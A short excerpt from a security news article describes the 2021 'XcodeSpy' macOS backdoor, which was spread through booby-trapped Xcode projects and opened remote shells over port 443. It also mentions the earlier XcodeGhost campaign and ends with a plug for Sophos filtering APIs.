Security News > 2021 > March > Serious Security: Mac “XcodeSpy” backdoor takes aim at Xcode devs
The hacked version of Xcode would add malware into iOS apps when they were compiled on an infected system, without infecting the source code of the app itself.
As we said at the time, "Developers with sloppy security practices, such as using illegally-acquired software of unvetted origin for production builds, turned into iOS malware generation factories for the crooks behind XcodeGhost."
The malware is delivered in the form of a booby-trapped version of a legitimate Xcode project that the crooks used as a cover name for their malware.
Outbound connections to port 443 are typically secure web connections, such as when you browse to a URL starting https://, so they are often considered unexceptionable by firewalls.
Even if the remote shell is only open briefly, that's almost always enough time for the crooks to upload and launch yet more malware on your computer, giving them a beachhead to get back into your system at will, even after the initial remote shell has exited.
The call-home sites in this case are identified by Sophos web filtering products at connection time under the general category PROD COMMAND AND CONTROL and under the security category SEC MALWARE CALLHOME.If you are interested in real-time malware and web filtering and how you can build it into your own products and services, you might like to look at the SophosLabs Intelix APIs.